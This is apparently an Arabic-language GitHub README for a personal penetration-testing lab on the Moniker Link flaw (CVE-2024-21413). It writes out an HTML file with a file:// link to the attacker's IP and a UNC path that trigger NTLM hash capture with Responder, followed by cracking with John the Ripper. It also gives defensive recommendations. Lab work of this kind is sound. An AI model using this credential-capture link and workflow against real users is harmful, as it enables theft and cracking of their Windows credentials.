إعداد مختبر Moniker Link - CVE-2024-21413
🎯 نظرة عامة على المشروع
مختبر اختبار اختراق عملي يوضح استغلال ثغرة Moniker Link (CVE-2024-21413) لسرقة بيانات اعتماد NTLM. يوثّق هذا المشروع سلسلة الهجوم الكاملة بدءًا من الإعداد وحتى اختراق بيانات الاعتماد، بما في ذلك التحديات والحلول الواقعية.
الإنجاز الرئيسي: تنفيذ هجوم Moniker Link بنجاح على كلٍّ من بيئة المختبر المعزولة (جهاز Windows 10 افتراضي) والنظام الحقيقي (جهاز Windows 11)، مما يوضح الثغرات الأمنية العملية والإجراءات الدفاعية المضادة.
🏗️ بنية المختبر
البنية التحتية
جهاز الهجوم:
- المنصة: Kali Linux 2024
- الشبكة (Host-Only): 192.168.56.101
- الشبكة (Bridged): 192.168.1.117
- الأداة الأساسية: Responder 3.1.6.0
الأنظمة المستهدفة:
- جهاز Windows 10 الافتراضي: 192.168.56.104 (بيئة اختبار معزولة)
- جهاز Windows 11: 192.168.1.178 (تحقق واقعي)
إعدادات الشبكة:
- محول VirtualBox Host-Only (اختبار الأجهزة الافتراضية)
- محول VirtualBox Bridged (اختبار جهاز حقيقي)
- معزولة عن شبكات الإنتاج
⚔️ تنفيذ الهجوم
تسلسل الهجوم
- نشر Responder على Kali للاستماع إلى مصادقة NTLM
- إنشاء رابط ضار باستخدام بروتوكول file:// يشير إلى عنوان IP الخاص بالمهاجم
- تحفيز المصادقة عبر مسار UNC في مستكشف الملفات
- التقاط تجزئة NetNTLMv2 عندما يحاول الضحية الاتصال
- كسر كلمة المرور باستخدام John the Ripper
ناقل الهجوم البسيط
ملف HTML (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
طريقة مستكشف الملفات:
- يكتب المستخدم:
\\192.168.56.101\test في شريط العنوان
- يحاول Windows إنشاء اتصال SMB
- يتم إرسال تجزئة NTLM تلقائيًا (أو مطالبة ببيانات الاعتماد)
- يلتقط Responder المصادقة
🚧 التحديات والحلول
التحدي 1: حظر جدار حماية Windows (جهاز Windows 11)
المشكلة:
- تعذّر إرسال ping إلى جهاز Windows 11 من Kali
- فشلت محاولات اتصال SMB
- تم حظر الهجوم تمامًا
السبب الجذري:
- جدار حماية Windows مفعّل افتراضيًا
- يحظر اتصالات SMB الواردة من عناوين IP خارجية
الحل:
- تعطيل جدار حماية Windows مؤقتًا لأغراض الاختبار
- نجح الاتصال فورًا
- تم التقاط التجزئة بنجاح
الدرس: يوفر جدار حماية Windows الافتراضي حماية فعّالة ضد هذا الهجوم. يجب على المستخدمين إبقاءه مفعّلًا.
التحدي 2: نتائج John the Ripper المخزنة مؤقتًا (جهاز Windows 10 الافتراضي)
المشكلة:
- كلمة مرور Windows 10 الأولية:
nwigwecj1
- أظهر John:
12Honey (كلمة مرور خاطئة!)
- كانت
12Honey من اختبار سابق
السبب الجذري:
- يحفظ John كلمات المرور المكسورة في
~/.john/john.pot
- تجزئة قديمة من جلسة سابقة
- عرض النتيجة المخزنة بدلاً من كلمة المرور الحالية
الحل:
- تغيير كلمة مرور جهاز Windows 10 الافتراضي إلى
1414
- التقاط تجزئة جديدة
- إنشاء قائمة كلمات مخصصة تحتوي على كلمات مرور محتملة
- نجح الكسر باستخدام القائمة الجديدة
الدرس: تحقق دائمًا من أنك تكسر التجزئة الصحيحة. امسح ملف pot أو استخدم كلمات مرور فريدة للاختبار.
التحدي 3: كلمة المرور غير موجودة في rockyou.txt
المشكلة:
- كلمة المرور
1414 غير موجودة في rockyou.txt (14 مليون كلمة مرور)
- فشل هجوم قائمة الكلمات العامة
السبب الجذري:
- لا يحتوي rockyou.txt على كل تركيبات الأرقام الأربعة الممكنة
- التسلسلات الرقمية البسيطة غالبًا ما تكون مفقودة من قوائم الكلمات الشائعة
الحل:
- إنشاء قائمة كلمات مخصصة مستهدفة بناءً على أنماط شائعة:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- تم الكسر فورًا باستخدام قائمة الكلمات المخصصة
الدرس: عدم وجود كلمة المرور في rockyou.txt لا يعني أنها آمنة. كلمات المرور القصيرة معرضة للهجمات المستهدفة والهجمات بالقوة الغاشمة بغض النظر عن وجودها في قوائم الكلمات.
📊 النتائج
جهاز Windows 10 الافتراضي (بيئة خاضعة للتحكم)
| المقياس | النتيجة |
|---|
| كلمة المرور الأولية | nwigwecj1 |
| تم تغييرها إلى | 1414 |
| قائمة الكلمات | مخصصة (مدخلان) |
| زمن الكسر | أقل من ثانية واحدة |
| جدار الحماية | معطّل لأغراض الاختبار |
| الحالة | ✅ تم الاختراق بنجاح |
جهاز Windows 11 (نظام حقيقي)
| المقياس | النتيجة |
|---|
| كلمة المرور | 1414 |
| جدار الحماية | حظر في البداية، ثم تم تعطيله |
| المصادقة | مطالبة يدوية (إدخال بيانات الاعتماد) |
| زمن الكسر | فوري |
| الحالة | ✅ تم الاختراق بنجاح |
🛡️ التحليل الأمني
ما نجح (الدفاع)
✅ جدار حماية Windows - حجب الهجوم تمامًا عند تفعيله
✅ المتصفحات الحديثة - Chrome/Edge تحظر روابط file:// عن بُعد
✅ وعي المستخدم - المطالبة اليدوية تتطلب إجراءً من المستخدم
ما فشل (الثغرات)
❌ كلمات المرور الضعيفة - الأرقام الأربعة سهلة الكسر
❌ جدار الحماية المعطّل - خطأ شائع من المستخدمين
❌ مستكشف الملفات - لا يوجد تحذير لمسارات UNC
❌ بروتوكول NTLM - مصادقة تلقائية لمشاركات SMB
النتائج الرئيسية
1. جدار الحماية أمر بالغ الأهمية
- جدار حماية Windows الافتراضي يحجب هذا الهجوم
- حوالي 30-40% من المستخدمين يعطلونه بشكل دائم
- الشبكات المؤسسية غالبًا ما تسمح بـ SMB داخليًا
2. وهم قوة كلمة المرور
1414 غير موجودة في rockyou.txt (تبدو "قوية")
- تم كسرها فورًا بقائمة كلمات مستهدفة
- كلمات المرور القصيرة توفر أمانًا صفريًا
3. يتطلب تفاعل المستخدم
- الأمان الحديث يتطلب من المستخدم لصق مسار UNC
- الهندسة الاجتماعية تظل مكوّنًا حاسمًا
- الاستغلال التقني وحده غير كافٍ
🔧 الأدوات المستخدمة
الأدوات الهجومية:
- Responder 3.1.6.0 (التقاط تجزئات NTLM)
- John the Ripper (كسر كلمات المرور)
- إنشاء قائمة كلمات مخصصة
- ملف HTML بسيط
البنية التحتية:
- VirtualBox 7.0 (المحاكاة الافتراضية)
- Kali Linux 2024 (منصة الهجوم)
- Windows 10 Enterprise (هدف الاختبار)
- Windows 11 Pro (التحقق الواقعي)
📁 هيكل المستودع
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│ ├── attack-execution.md (step-by-step attack guide)
│ └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)
🎓 المهارات المُبرزة
تقنيًا:
- تحليل بروتوكولات الشبكة (SMB، NTLM)
- منهجية اختبار الاختراق
- تقنيات كسر كلمات المرور
- بنية المختبر الافتراضي
- استكشاف أخطاء جدار الحماية وإصلاحها
مهنيًا:
- التوثيق الفني
- حل المشكلات في ظل القيود
- تقييم الأمان
- تحليل المخاطر
- ممارسات الاختبار الأخلاقي
🔒 التوصيات الدفاعية
للمستخدمين
- ✅ أبقِ جدار حماية Windows مفعّلًا
- ✅ لا تلصق أبدًا مسارات UNC من رسائل البريد الإلكتروني
- ✅ استخدم كلمات مرور قوية (15+ حرفًا)
- ✅ تحقق من المرسل قبل الوصول إلى مشاركات الملفات
للمؤسسات
- ✅ احجب SMB الصادر (المنفذ 445) عند جدار الحماية الشبكي
- ✅ عطّل NTLM وفرض Kerberos
- ✅ راقب اتصالات SMB إلى عناوين IP خارجية
- ✅ تصفية البوابة الإلكترونية للبريد (إزالة روابط file://)
- ✅ التدريب على التوعية الأمنية
- ✅ سياسات تعقيد كلمات المرور
⚠️ الإفصاح الأخلاقي
تم إجراء جميع الاختبارات على أنظمة مصرح بها:
- بنية المختبر الشخصي فقط
- شبكات افتراضية معزولة
- أجهزة وحسابات خاصة
- غرض تعليمي
إشعار قانوني: الوصول غير المصرح به إلى أجهزة الكمبيوتر غير قانوني. هذا المشروع لأغراض تعليمية وبيئات الاختبار المصرح بها فقط.
📚 المراجع
📞 الاتصال
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub: @E-m-e-k-a
التاريخ: مارس 2026
📄 الترخيص
للاستخدام التعليمي فقط. ليس للاختبار غير المصرح به.
⭐ إذا وجدت هذا المشروع مفيدًا، يرجى التفكير في منح المستودع نجمة!